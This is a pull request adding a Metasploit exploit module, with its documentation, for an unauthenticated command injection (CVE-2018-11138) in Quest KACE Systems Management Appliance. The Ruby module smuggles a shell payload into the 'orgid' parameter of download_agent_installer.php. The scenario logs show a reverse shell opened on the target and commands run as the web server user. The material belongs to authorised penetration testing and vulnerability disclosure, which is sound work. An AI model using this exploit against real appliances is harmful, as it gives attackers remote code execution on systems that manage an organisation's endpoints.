### PR TITLE
Add Quest KACE Systems Management Command Injection

### DIFF
--- a/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md
+++ b/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md
@@ -1,0 +1,82 @@
+## Description
+
+  This module exploits a command injection vulnerability in Quest KACE
+  Systems Management Appliance version 8.0.318 (and possibly prior).
+
+  The `download_agent_installer.php` file allows unauthenticated users
+  to execute arbitrary commands as the web server user `www`.
+
+
+## Vulnerable Application
+ 
+  [Quest KACE Systems Management Appliance](https://www.quest.com/products/kace-systems-management-appliance/) endpoint systems management solution.
+
+  This module has been tested successfully on Quest KACE SMA K1000 version 8.0 (Build 8.0.318).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. `use exploit/unix/http/quest_kace_systems_management_rce`
+  3. `set ORGANIZATION <ORGANIZATION>` (default: `1`)
+  4. `set AGENT_VERSION <AGENT_VERSION>` (default: `8.0.152`)
+  5. `run`
+  6. You should get a session
+
+
+## Options
+
+  **AGENT_VERSION**
+
+  A valid Windows agent version must be specified. (default: `8.0.152`)
+
+  If file sharing is enabled, the agent versions are available within the
+  `\\kace.local\client\agent_provisioning\windows_platform` Samba share.
+
+  Additionally, various agent versions are listed on the KACE website.
+
+  **ORGANIZATION**
+
+  Organization ID used within the appliance. (default: `1`)
+
+  **SERIAL**
+
+  Serial number for the appliance. By default, the module attempts to
+  retrieve the serial from `/common/about.php`.
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/unix/http/quest_kace_systems_management_rce 
+  msf5 exploit(unix/http/quest_kace_systems_management_rce) > set rhost 172.16.123.123
+  rhost => 172.16.123.123
+  msf5 exploit(unix/http/quest_kace_systems_management_rce) > check
+  [*] 172.16.123.123:80 The target appears to be vulnerable.
+  msf5 exploit(unix/http/quest_kace_systems_management_rce) > set ORGANIZATION 1
+  ORGANIZATION => 1
+  msf5 exploit(unix/http/quest_kace_systems_management_rce) > set AGENT_VERSION 8.0.152
+  AGENT_VERSION => 8.0.152
+  msf5 exploit(unix/http/quest_kace_systems_management_rce) > run
+
+  [*] Started reverse TCP handler on 172.16.123.188:4444 
+  [*] Sending payload (505 bytes)
+  [+] Payload executed successfully
+  [!] Tried to delete /tmp/agentprov/1#;/, unknown result
+
+  492648046
+  kYWSsqpLmmERqEpLazwFOTzulPvsvShY
+  /kbox/kboxwww/common
+  EfiuBIzdwhsSLfEpgHrRjbgjszjCkfhf
+  ZGtYicImqwCnmUNGBZTpqDSPXojYXjkd
+  jCmxJgLnffuOAlsAFmWygrbOhCWPCNzD
+  id
+  uid=80(www) gid=80(www) groups=80(www)
+  uname -a
+  FreeBSD k1000 11.0-RELEASE-p12 FreeBSD 11.0-RELEASE-p12 #0: Wed Aug  9 10:03:39 UTC 2017     root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  amd64
+  ^C
+  Abort session 1? [y/N]  y
+
+  [*] 172.16.123.123 - Command shell session 1 closed.  Reason: User exit
+  ```
+

--- a/modules/exploits/unix/http/quest_kace_systems_management_rce.rb
+++ b/modules/exploits/unix/http/quest_kace_systems_management_rce.rb
@@ -43,6 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           ['CVE', '2018-11138'],
+          ['URL', 'https://support.quest.com/product-notification/noti-00000134'],
           ['URL', 'https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities']
         ],
       'Payload'        =>
@@ -82,9 +83,16 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Detected
     end
 
-    version = res.headers['X-KACE-Version'].to_s
+    version = Gem::Version.new res.headers['X-KACE-Version'].to_s
     vprint_status "Found KACE appliance version #{version}"
-    if Gem::Version.new(version) <= Gem::Version.new('8.0.318')
+
+    # Patched versions : https://support.quest.com/product-notification/noti-00000134
+    if version < Gem::Version.new('7.0') ||
+       (version >= Gem::Version.new('7.0') && version < Gem::Version.new('7.0.121307')) ||
+       (version >= Gem::Version.new('7.1') && version < Gem::Version.new('7.1.150')) ||
+       (version >= Gem::Version.new('7.2') && version < Gem::Version.new('7.2.103')) ||
+       (version >= Gem::Version.new('8.0') && version < Gem::Version.new('8.0.320')) ||
+       (version >= Gem::Version.new('8.1') && version < Gem::Version.new('8.1.108'))
       return CheckCode::Appears
     end
 

--- a/modules/exploits/unix/http/quest_kace_systems_management_rce.rb
+++ b/modules/exploits/unix/http/quest_kace_systems_management_rce.rb
@@ -1,0 +1,154 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Quest KACE Systems Management Command Injection',
+      'Description'    => %q{
+        This module exploits a command injection vulnerability in Quest KACE
+        Systems Management Appliance version 8.0.318 (and possibly prior).
+
+        The `download_agent_installer.php` file allows unauthenticated users
+        to execute arbitrary commands as the web server user `www`.
+
+        A valid Organization ID is required. The default value is `1`.
+
+        A valid Windows agent version number must also be provided. If file
+        sharing is enabled, the agent versions are available within the
+        `\\kace.local\client\agent_provisioning\windows_platform` Samba share.
+        Additionally, various agent versions are listed on the KACE website.
+
+        This module has been tested successfully on Quest KACE Systems
+        Management Appliance K1000 version 8.0 (Build 8.0.318).
+      },
+      'License'        => MSF_LICENSE,
+      'Privileged'     => false,
+      'Platform'       => 'unix', # FreeBSD
+      'Arch'           => ARCH_CMD,
+      'DisclosureDate' => 'May 31 2018',
+      'Author'         =>
+        [
+          'Leandro Barragan', # Discovery and PoC
+          'Guido Leo',        # Discovery and PoC
+          'Brendan Coles',    # Metasploit
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-11138'],
+          ['URL', 'https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities']
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 1024,
+          'BadChars'    => "\x00\x27",
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic perl'
+            }
+        },
+      'Targets'        => [['Automatic', {}]],
+      'DefaultTarget'  => 0))
+    register_options [
+      OptString.new('SERIAL',        [false, 'Serial number', '']),
+      OptString.new('ORGANIZATION',  [true, 'Organization ID', '1']),
+      OptString.new('AGENT_VERSION', [true, 'Windows agent version', '8.0.152'])
+    ]
+  end
+
+  def check
+    res = send_request_cgi('uri' => normalize_uri('common', 'download_agent_installer.php'))
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.code == 302 && res.headers.to_s.include?('X-KACE-Appliance')
+      vprint_status 'Remote host is not a Quest KACE appliance'
+      return CheckCode::Safe
+    end
+
+    unless res.headers['X-KACE-Version'] =~ /\A([0-9]+)\.([0-9]+)\.([0-9]+)\z/
+      vprint_error 'Could not determine KACE appliance version'
+      return CheckCode::Detected
+    end
+
+    version = res.headers['X-KACE-Version'].to_s
+    vprint_status "Found KACE appliance version #{version}"
+    if Gem::Version.new(version) <= Gem::Version.new('8.0.318')
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def serial_number
+    return datastore['SERIAL'] unless datastore['SERIAL'].to_s.eql? ''
+
+    res = send_request_cgi('uri' => normalize_uri('common', 'about.php'))
+    return unless res
+
+    res.body.scan(/Serial Number: ([A-F0-9]+)/).flatten.first
+  end
+
+  def exploit
+    check_code = check
+    unless [CheckCode::Appears, CheckCode::Detected].include? check_code
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    serial = serial_number
+    if serial.to_s.eql? ''
+      print_error 'Could not retrieve appliance serial number. Try specifying a SERIAL.'
+      return
+    end
+    vprint_status "Using serial number: #{serial}"
+
+    print_status "Sending payload (#{payload.encoded.length} bytes)"
+
+    vars_get = Hash[{
+      'platform' => 'windows',
+      'serv'     => Digest::SHA256.hexdigest(serial),
+      'orgid'    => "#{datastore['ORGANIZATION']}#; #{payload.encoded} ",
+      'version'  => datastore['AGENT_VERSION']
+    }.to_a.shuffle]
+
+    res = send_request_cgi({
+      'uri'      => normalize_uri('common', 'download_agent_installer.php'),
+      'vars_get' => vars_get
+    }, 10)
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.headers.to_s.include?('KACE') || res.headers.to_s.include?('KBOX')
+      fail_with Failure::UnexpectedReply, 'Unexpected reply'
+    end
+
+    case res.code
+    when 200
+      print_good 'Payload executed successfully'
+    when 404
+      fail_with Failure::BadConfig, 'The specified AGENT_VERSION is not valid for the specified ORGANIZATION'
+    when 302
+      if res.headers['location'].include? 'error.php'
+        fail_with Failure::UnexpectedReply, 'Server encountered an error'
+      end
+      fail_with Failure::BadConfig, 'The specified SERIAL is incorrect'
+    else
+      print_error 'Unexpected reply'
+    end
+
+    register_dir_for_cleanup "/tmp/agentprov/#{datastore['ORGANIZATION']}#;/"
+  end
+end


### PR DESCRIPTION
Add Quest KACE Systems Management Command Injection exploit module.

         This module exploits a command injection vulnerability in Quest KACE
         Systems Management Appliance version 8.0.318 (and possibly prior).
 
         The `download_agent_installer.php` file allows unauthenticated users
         to execute arbitrary commands as the web server user `www`.
 
         A valid Organization ID is required. The default value is `1`.
 
         A valid Windows agent version number must also be provided. If file
         sharing is enabled, the agent versions are available within the
         `\\kace.local\client\agent_provisioning\windows_platform` Samba share.
         Additionally, various agent versions are listed on the KACE website.
 
         This module has been tested successfully on Quest KACE Systems
         Management Appliance K1000 version 8.0 (Build 8.0.318).

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/unix/http/quest_kace_systems_management_rce`
- [x] `set ORGANIZATION 1`
- [x] `set AGENT_VERSION 8.0.152`
- [x] `run`
- [x] **Verify** you get a shell


## Scenarios

```
msf5 > use exploit/unix/http/quest_kace_systems_management_rce 
msf5 exploit(unix/http/quest_kace_systems_management_rce) > set rhost 172.16.191.192
rhost => 172.16.191.192
msf5 exploit(unix/http/quest_kace_systems_management_rce) > check
[*] 172.16.191.192:80 The target appears to be vulnerable.
msf5 exploit(unix/http/quest_kace_systems_management_rce) > set ORGANIZATION 1
ORGANIZATION => 1
set AGENT_VERSION 8.0.152
AGENT_VERSION => 8.0.152
msf5 exploit(unix/http/quest_kace_systems_management_rce) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Sending payload (505 bytes)
[+] Payload executed successfully
[!] Tried to delete /tmp/agentprov/1#;/, unknown result

492648046
kYWSsqpLmmERqEpLazwFOTzulPvsvShY
/kbox/kboxwww/common
EfiuBIzdwhsSLfEpgHrRjbgjszjCkfhf
ZGtYicImqwCnmUNGBZTpqDSPXojYXjkd
jCmxJgLnffuOAlsAFmWygrbOhCWPCNzD
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD k1000 11.0-RELEASE-p12 FreeBSD 11.0-RELEASE-p12 #0: Wed Aug  9 10:03:39 UTC 2017     root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  amd64
^C
Abort session 1? [y/N]  y

[*] 172.16.191.192 - Command shell session 1 closed.  Reason: User exit
```
